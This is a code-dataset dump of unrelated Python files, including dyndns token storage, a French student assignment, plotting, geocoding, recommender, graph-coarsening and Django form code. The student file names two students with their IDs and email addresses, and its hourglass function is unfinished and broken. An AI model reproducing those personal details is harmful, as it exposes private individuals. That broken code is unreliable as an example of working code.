json.load(settings_file)\n except ValueError:\n existing_config = {}\n settings_file.seek(0)\n settings_file.truncate()\n existing_config.update({\n domain: {\n 'provider_name': config.providerName,\n 'url_api': config.urlAPI,\n 'access_token': context.access_token,\n 'refresh_token': context.refresh_token,\n 'iat': context.iat,\n 'access_token_expires_in': context.access_token_expires_in\n }\n })\n json.dump(existing_config, settings_file, sort_keys=True, indent=1)\n return \"Domain {} has been succesfully configured.\".format(domain)\n return \"Could not store domain config.\"\n","sub_path":"dyndns/domain_setup.py","file_name":"domain_setup.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"647888765","text":"\"\"\"\n(quote ((section MIPI15.1)(groupe )\n (date \"Wed Sep 27 17:39:54 CEST 2017\")(time \"1506526794\")\n (id1 \"3701204\")(nom1 \"ERGIN\")(prenom1 \"Erkan\")\n (mel1 \"erg.erkn@gmail.com\")\n (id2 \"3700131\")(nom2 \"AHAMADA\")(prenom2 \"Soudaissi\")\n (mel2 \"soudaissi@outlook.fr\")))\n\n\nComment a-t-il calcule volume_tetraedre(2.1,2.2,2.3,2.4,2.5,2.6)?\nN'a pas fait ex 2.4\nsablier pas fait (a peine commence)\n\"\"\"\n\nimport sys\nsys.path.append(\"/home/agrospel/logiciel/MrPython/mrpython/\")\nfrom studentlib.gfx.image import *\nfrom studentlib.gfx.img_canvas import *\n\nprint(\"Interpretation:\")\n\nimport math\ndef volume_tetraedre(a,b,c,d,e,f):\n \"\"\"number**6->float\n hypothese a>=0 and b>=0 and c>=0 and d>=0 and e>=0 and f>=0\n retourne le volume d'un tetraedre\"\"\"\n x=a**2+b**2-d**2\n y=b**2+c**2-e**2\n z=a**2+c**2-f**2\n p=4*a**2*b**2*c**2\n q=(a**2*x**2)+(b**2*z**2)+(c**2*y**2)\n r=x*y*z\n return (1/12)*math.sqrt(p-q+r)\n\n#jeux de test\n\nassert volume_tetraedre(1,1,1,1,1,1)==0.11785113019775792\nassert volume_tetraedre(2,2,2,2,2,2)==0.9428090415820634\nassert volume_tetraedre(2.1,2.2,2.3,2.4,2.5,2.6)==1.4820021906379073\n\ndef volume_tetraedre_regulier(g):\n \"\"\"number->float\n hypothese g>=0\n retourne le volume d'un tetradre regulier\"\"\"\n x=g**2+g**2-g**2\n y=g**2+g**2-g**2\n z=g**2+g**2-g**2\n p=4*g**2*g**2*g**2\n q=(g**2*x**2)+(g**2*z**2)+(g**2*y**2)\n r=x*y*z\n return (1/12)*math.sqrt(p-q+r)\n\n#jeux de test\n\nassert volume_tetraedre_regulier(1)==0.11785113019775792\nassert volume_tetraedre_regulier(2)==0.9428090415820634\nassert volume_tetraedre_regulier(3)==3.181980515339464\n\n#Exercice 2.4\n\ndef f(n1, n2, n3):\n \"\"\"Number*Number*Number->str\n retourne un cas parmi 6 selon les valeurs de n1, n2 et n3.\"\"\"\n if n1 < n2 and n2 < n3:\n return 'cas 1'\n elif n1 < n3 and n3 < n2:\n return 'cas 2'\n elif n2 < n1 and n1 < n3:\n return 'cas 3'\n elif n2 < n3 and n3 < n1:\n return 'cas 4'\n elif n3 < n1 and n1 < n2:\n return 'cas 5'\n else:\n return 'cas 6'\n\n#jeux de test\n\nassert f(1,2,3)=='cas 1'\nassert f(1,7,5)=='cas 2'\nassert f(4,3,8)=='cas 3'\nassert f(10,5,8)=='cas 4'\nassert f(13,14,5)=='cas 5'\nassert f(1,1,1)=='cas 6'\n\n#Exercice 2.7\n\ndef sablier(x0,y0,l,h):\n \"\"\"float**4->Image\n hypothese -1<=x0<=1 and -1<=y0<=1 and 0<=l<=2 and 0<=h<=2\n retourne un sablier dont les coordonnées du coin inferieur gauche sont (x0,\ny0) \"\"\"\n\n#triangle inferieur\n triangle_inferieur= (fill_triangle(x0,y0,x0+h,y0,x0+l/2,y0+h/2))\n\n#triangle superieur\n triangle_superieur= (fill_triangle(x0+l/2+y1+h/2))\n\n figure =overlay(triangle_inferieur, triangle_superieur)\n\n show_image(figure)\n\nsablier(-0.5,0.5,0.5,0.5)\n","sub_path":"monitorat/1I001-2/15.1/rendu2/ergin-ahamada-1506526794.py","file_name":"ergin-ahamada-1506526794.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"406191396","text":"import matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom matplotlib.ticker import MaxNLocator\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nsns.set(font_scale=1.2)\nmpl.rcParams['figure.dpi'] = 300\n\ndf = pd.read_csv('neat-results.csv')\ndf['gen'] = df['gen'].apply(lambda x: x + 1)\ndf['EA'] = 'neat'\n\ndf2 = pd.read_csv('neuro-results.csv')\ndf2['gen'] = df2['gen'].apply(lambda x: x + 1)\ndf2['EA'] = 'neuro'\n\nenemy0 = pd.concat([df.loc[df['enemy_group'] == 0], df2.loc[df2['enemy_group'] == 0]])\nenemy1 = pd.concat([df.loc[df['enemy_group'] == 1], df2.loc[df2['enemy_group'] == 1]])\n\nax = sns.lineplot(data=enemy0, x='gen', y='value', hue='EA', style='metric')\nax.set(xlabel='generation', ylabel='fitness', title='enemies [1,2,4,7]')\nax.xaxis.set_major_locator(MaxNLocator(integer=True))\nplt.tight_layout()\nplt.savefig('results-enemy-group-0.png')\n\nplt.cla()\n\nax = sns.lineplot(data=enemy1, x='gen', y='value', hue='EA', style='metric')\nax.set(xlabel='generation', ylabel='fitness', title='enemies [3,6,7,8]')\nax.xaxis.set_major_locator(MaxNLocator(integer=True))\nplt.tight_layout()\nplt.savefig('results-enemy-group-1.png')\n","sub_path":"plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"351861033","text":"import json\nfrom urllib import urlencode\nimport urllib2\n\nfrom compass import model\n\nclass OSMap(model.Service):\n\turl = 'http://nominatim.openstreetmap.org/search?'\n\n\tdef __init__(self, ua):\n\t\t\"\"\"\n\t\t1 req/sec minimum between reqs for osm\n\n\t\tua User-Agent string\n\t\t\"\"\"\n\t\tself.ua = ua\n\n\tdef get(self, location):\n\t\ttry:\n\t\t\tqs =urlencode({'q':location.encode('utf-8'),'format':'json'})\n\t\t\treq = urllib2.Request(self.url+qs)\n\t\t\treq.add_header('User-Agent', self.ua)\n\t\t\tpage = urllib2.urlopen(req)\n\t\t\tobj = json.loads(page.read())\n\t\t\tlat = float(obj[0]['lat'])\n\t\t\tlng = float(obj[0]['lon'])\n\t\t\treturn (lat,lng)\n\t\texcept:\n\t\t\treturn 0\n","sub_path":"env/Lib/site-packages/compass/services/openstreetmap.py","file_name":"openstreetmap.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"367889621","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2019, Alchemy Meister\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice,this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\n\"\"\"\nimport configparser\nimport os\n\nclass ConfigReader:\n DATA_FOLDER = 'data'\n\n values = {}\n\n def __init__(self, filename):\n self.path = os.path.join(ConfigReader.DATA_FOLDER, filename)\n self.parser = configparser.ConfigParser()\n try:\n self.parser.read(self.path)\n except configparser.Error as exception:\n print(\n 'Error reading config data from {}. Error: {}'.format(\n self.path, exception\n )\n )\n\n def get_property(self, section, property_string, default_value):\n try:\n if isinstance(default_value, bool):\n value = self.parser.getboolean(section, property_string)\n else:\n value = self.parser.get(section, property_string)\n except configparser.Error:\n value = default_value\n\n if section not in self.parser.sections():\n self.parser.add_section(section)\n self.parser.set(section, property_string, str(value))\n return value\n\n def set_property(self, section, property_string, value):\n self.parser.set(section, property_string, str(value))\n\n def add_comment(self, comment):\n if 'Comments' not in self.parser.sections():\n self.parser.add_section('Comments')\n self.parser.set('Comments', '; ' + comment, \"\")\n\n def write(self):\n with open(self.path, 'w') as w_file:\n self.parser.write(w_file)\n","sub_path":"config/config_reader.py","file_name":"config_reader.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"569196852","text":"import sys\n\n# https://practice.geeksforgeeks.org/problems/parenthesis-checker/0\n\n\n# Given an expression string exp. Examine whether the pairs and the orders\n# of “{“,”}”,”(“,”)”,”[“,”]” are correct in exp.\n# For example, the program should print 'balanced' for exp = “[()]{}{[()()]()}”\n# and 'not balanced' for exp = “[(])”\n\n###############################################################################\n\nstack = []\n\ndef push(x):\n stack.append(x)\n return\n\ndef pop():\n return stack.pop()\n\ndef is_balanced(s):\n for ch in s:\n if ch == '{' or ch == '(' or ch == '[':\n push(ch)\n else: #if ch == '}' or ch == ')' or ch == ']'\n from_stack = pop()\n if ch == '}' and from_stack != '{': return False\n if ch == ')' and from_stack != '(': return False\n if ch == ']' and from_stack != '[': return False\n return len(stack) == 0\n\n###############################################################################\n\nif __name__ == \"__main__\":\n\n test_inputs = []\n test_inputs.append( (\"{([])}\", True) )\n test_inputs.append( (\"()\", True) )\n test_inputs.append( (\"([]\", False) )\n\n \"\"\" Run process on sample inputs \n \"\"\"\n for inputs, results in test_inputs:\n print(f'{inputs}')\n tf = is_balanced(inputs)\n print(f\"{tf} expected: {results}\\n\")\n\n","sub_path":"interview-prep/geeks_for_geeks/stack_and_queue/parenthesis_checker.py","file_name":"parenthesis_checker.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"149518944","text":"# written by Yangyu GAO, z5223548\n\nfrom surprise import KNNWithMeans\nfrom surprise import Dataset\nimport pandas as pd\nimport numpy as np\n\n\ndef read_file(path):\n header = ['user_id', 'item_id', 'rating', 'timestamp']\n # read data files\n file = pd.read_csv(path, sep='\\t', names=header)\n\n file = file.drop(['timestamp'], axis=1)\n\n # get total users and total items\n user = file.user_id.unique().shape[0]\n item = file.item_id.unique().shape[0]\n\n return file, user, item\n\n\nif __name__ == \"__main__\":\n data_path = './ml-100k/u.data'\n df, n_users, n_items = read_file(data_path)\n\n data = Dataset.load_builtin('ml-100k')\n\n # Retrieve the trainset.\n trainset = data.build_full_trainset()\n\n sim_options1 = {\n 'name': 'pearson_baseline',\n 'user_based': True\n }\n\n sim_options2 = {\n 'name': 'pearson_baseline',\n 'user_based': False\n }\n\n algo1 = KNNWithMeans(sim_options=sim_options1)\n algo1.fit(trainset)\n\n algo2 = KNNWithMeans(sim_options=sim_options2)\n algo2.fit(trainset)\n\n user_item_result = np.zeros((df.shape[0], 2))\n flag = 0\n for row in df.itertuples():\n user_item_result[flag][0] = algo1.predict(str(row[1] - 1), str(row[2] - 1), r_ui=(row[3]), verbose=False).est\n user_item_result[flag][1] = algo2.predict(str(row[1] - 1), str(row[2] - 1), r_ui=(row[3]), verbose=False).est\n flag += 1\n final_data = df.assign(user_pre=user_item_result[:, 0], item_pre=user_item_result[:, 1])\n final_data.to_csv(r'ratings.csv', index=False)\n\n","sub_path":"cf_for_mlp.py","file_name":"cf_for_mlp.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"290973041","text":"from __future__ import division\n\nimport torch\n\n\nclass Graclus(object):\n \"\"\"Converts an adjacency matrix to :obj:`level` coarsened graphs saved in\n :obj:`data['adjs']` based on the `\"Convolutional Neural Networks on Graphs\n with Fast Localized Spectral Filtering\"\n `_ paper.\n\n Args:\n level (int): Number of coarsened graphs to compute.\n (default: :obj:`1`)\n\n :class:`Graclus` and pseudo-coordinate transforms can be composed:\n\n Example:\n\n >>> Compose([Graclus(4), CartesianAdj()])\n \"\"\"\n\n def __init__(self, level=1):\n self.level = level\n\n def __call__(self, data, rid=None):\n adj, position = data.adj, data.position\n\n adjs, positions, perm = graclus(adj, position, self.level, rid)\n\n data.input = perm_input(data.input, perm)\n data.adj = None\n data.add('adjs', adjs)\n data.position = None\n data.add('positions', positions)\n\n return data\n\n\ndef adj_distance(adj, position):\n n = adj.size(0)\n index = adj._indices()\n row, col = index\n start, end = position[row], position[col]\n dist = end - start\n dist = (dist * dist).sum(1)\n std = dist.sqrt().std()\n std = std * std\n weight = torch.exp(dist / (-2 * std))\n return torch.sparse.FloatTensor(index, weight, torch.Size([n, n]))\n\n\ndef graclus(adj, position, level, rid=None):\n adjs = [adj]\n positions = [position]\n clusters = []\n for _ in range(level):\n adj_d = adj_distance(adj, position)\n\n cluster, cluster_full, singleton = normalized_cut(adj_d, rid)\n rid = None\n clusters.append(cluster_full)\n\n # Compute new adjacency.\n adj = cluster_adj(adj, cluster)\n adjs.append(adj)\n\n # Compute new positions.\n position = cluster_position(position, cluster_full, singleton)\n positions.append(position)\n\n # Permute inputs, adjacencies and positions.\n perms = compute_perms(clusters)\n\n adjs = [perm_adj(adjs[i], perms[i]) for i in range(len(perms))]\n positions = [perm_input(positions[i], perms[i]) for i in range(len(perms))]\n\n return adjs, positions, perms[0]\n\n\ndef normalized_cut(adj, rid=None):\n n = adj.size(0)\n rid = torch.randperm(n) if rid is None else rid\n cluster = torch.LongTensor(n).fill_(-1)\n\n row, col = adj._indices()\n weight = adj._values()\n\n # Fix graphs with self-loops.\n mask = row != col\n row, col, weight = row[mask], col[mask], weight[mask]\n\n one = weight.new(weight.size(0)).fill_(1)\n degree = 1 / weight.new(n).fill_(0).scatter_add_(0, row, one)\n weight = weight * (degree[row] + degree[col])\n\n # Sort by weight.\n weight, perm = weight.sort(dim=0, descending=True)\n row = row[perm]\n col = col[perm]\n\n # Sort by rid.\n _, perm = rid[row].sort()\n row = row[perm]\n col = col[perm]\n\n # Find cluster values.\n count = 0\n while row.dim() > 0:\n cluster[row[0]] = count\n cluster[col[0]] = count\n\n mask = (row != row[0]) & (row != col[0])\n mask &= (col != row[0]) & (col != col[0])\n\n row = row[mask]\n col = col[mask]\n\n count += 1\n\n # Append singleton values to the end.\n singleton = cluster == -1\n num_singletons = singleton.sum()\n if num_singletons > 0:\n index = torch.arange(count, count + num_singletons).long()\n cluster[singleton] = index\n cluster_full = torch.cat([cluster, index], dim=0)\n return cluster, cluster_full, singleton\n else:\n return cluster, cluster, singleton\n\n\ndef cluster_adj(adj, cluster):\n n = cluster.max() + 1\n row, col = adj._indices()\n row, col = cluster[row], cluster[col]\n weight = adj._values()\n mask = row != col\n row, col, weight = row[mask], col[mask], weight[mask]\n index = torch.stack([row, col], dim=0)\n adj = torch.sparse.FloatTensor(index, weight, torch.Size([n, n]))\n return adj\n\n\ndef cluster_position(pos, cluster, singleton):\n dim = pos.size(1)\n singleton = singleton.repeat(dim).view(dim, -1).t()\n pos = torch.cat([pos, pos[singleton].view(-1, dim)], dim=0)\n n = cluster.max() + 1\n return torch.stack(\n [\n pos.new(n).fill_(0).scatter_add_(0, cluster, pos[:, i]) / 2\n for i in range(dim)\n ],\n dim=1)\n\n\ndef compute_perms(clusters):\n n = clusters[-1].max() + 1\n\n perm = torch.arange(0, n).long()\n perms = [perm]\n\n for i in range(len(clusters) - 1, -1, -1):\n cluster = clusters[i]\n max_cluster = cluster.max() + 1\n\n # Append double fake nodes.\n if max_cluster < n:\n index = torch.arange(max_cluster, n).long().repeat(2)\n cluster = torch.cat([cluster, index], dim=0)\n\n cluster = perm.sort()[1][cluster]\n _, rid = cluster.sort()\n n *= 2\n perm = torch.arange(0, n).long()[rid]\n perms.append(perm)\n\n return perms[::-1]\n\n\ndef perm_adj(adj, perm):\n n = perm.size(0)\n row, col = adj._indices()\n\n _, perm = perm.sort()\n row = perm[row]\n col = perm[col]\n index = torch.stack([row, col], dim=0)\n\n adj = torch.sparse.FloatTensor(index, adj._values(), torch.Size([n, n]))\n return adj.coalesce()\n\n\ndef perm_input(input, perm):\n n = input.size(0)\n num_fake_nodes = perm.size(0) - n\n size = list(input.size())\n size[0] = num_fake_nodes\n input = torch.cat([input, input.new(*size).fill_(0)], dim=0)\n return input[perm]\n","sub_path":"torch_geometric/transforms/graclus.py","file_name":"graclus.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"421813692","text":"import re\nfrom django import forms\nfrom .models import Talentgram\nfrom PIL import Image\n\n\nclass TalentgramCreateForm(forms.ModelForm):\n\n class Meta:\n model = Talentgram\n fields = ['added', 'media_type']\n\n def __init__(self, *args, **kwargs):\n super(TalentgramCreateForm, self).__init__(*args, **kwargs)\n self.fields['added'].disabled = True\n\n\nclass TalentgramImageForm(forms.ModelForm):\n\n class Meta:\n model = Talentgram\n fields = ['image']\n\n def clean_image(self):\n # set some image size maximums and minimums:\n # not allow images that are too large for the sake of page load times and image storage space\n # not allow images that are too small for quality standards.\n data = self.cleaned_data['image']\n im = Image.open(data)\n width = im.size[0]\n height = im.size[1]\n is_horizontal = True if width > height else False\n is_vertical = True if width < height else False\n is_square = True if width == height else False\n data_as_string = str(data)\n ok_extensions = data_as_string.lower().endswith(('.png', '.jpg', '.jpeg', '.gif'))\n if ok_extensions is False:\n raise forms.ValidationError('File must be a jpg, png or gif and filename must have an extension')\n elif width > 1200:\n raise forms.ValidationError(\"Image width must be 1200px or less\")\n elif height > 800:\n raise forms.ValidationError(\"Image height must be 700px or less\")\n elif is_horizontal and width < 400:\n raise forms.ValidationError(\"Image is only %i wide. Horizontal images be at least 400px wide\" % width)\n elif is_vertical and height < 400:\n raise forms.ValidationError(\"Image is only %i tall. Vertical images must be at least 400px tall\" % height)\n elif is_square and width < 400:\n raise forms.ValidationError(\"Image is %i x %i. A square images must be at least 400 x 400\" % (width, height))\n return data\n\n\nclass TalentgramThumbForm(forms.ModelForm):\n\n class Meta:\n model = Talentgram\n fields = ['thumbnail']\n\n def clean_thumbnail(self):\n data = self.cleaned_data['thumbnail']\n im = Image.open(data)\n width = im.size[0]\n height = im.size[1]\n data_as_str = str(data)\n ok_extensions = data_as_str.lower().endswith(('.png', '.jpg', '.jpeg', '.gif'))\n if ok_extensions is False:\n raise forms.ValidationError('File must be a jpg, png or gif and filename must have an extension')\n elif width != height:\n raise forms.ValidationError(\"Image must be perfect square\")\n elif width < 400:\n raise forms.ValidationError(\"Image is %i x %i. Thumbnail must be at least 400 x 400\" % (width, height))\n return data\n\n\nclass TalentgramEmbedForm(forms.ModelForm):\n\n class Meta:\n model = Talentgram\n fields = ['embed']\n\n def clean_embed(self):\n # look for instagram embed script and remove it\n data = self.cleaned_data['embed']\n pattern = r'((